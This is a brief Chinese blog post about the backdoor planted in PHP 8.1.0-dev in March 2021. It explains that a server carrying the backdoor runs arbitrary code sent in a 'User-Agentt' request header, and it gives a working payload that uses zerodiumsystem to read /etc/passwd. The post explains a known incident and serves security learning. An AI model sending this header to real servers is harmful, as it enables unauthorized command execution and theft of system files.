PHP-8.1.0-dev 后门命令执行

PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。 

添加请求头

User-Agentt: zerodiumsystem("cat /etc/passwd");

posted @ 2021-08-11 16:30  逗比大师  阅读(177)  评论(0编辑  收藏  举报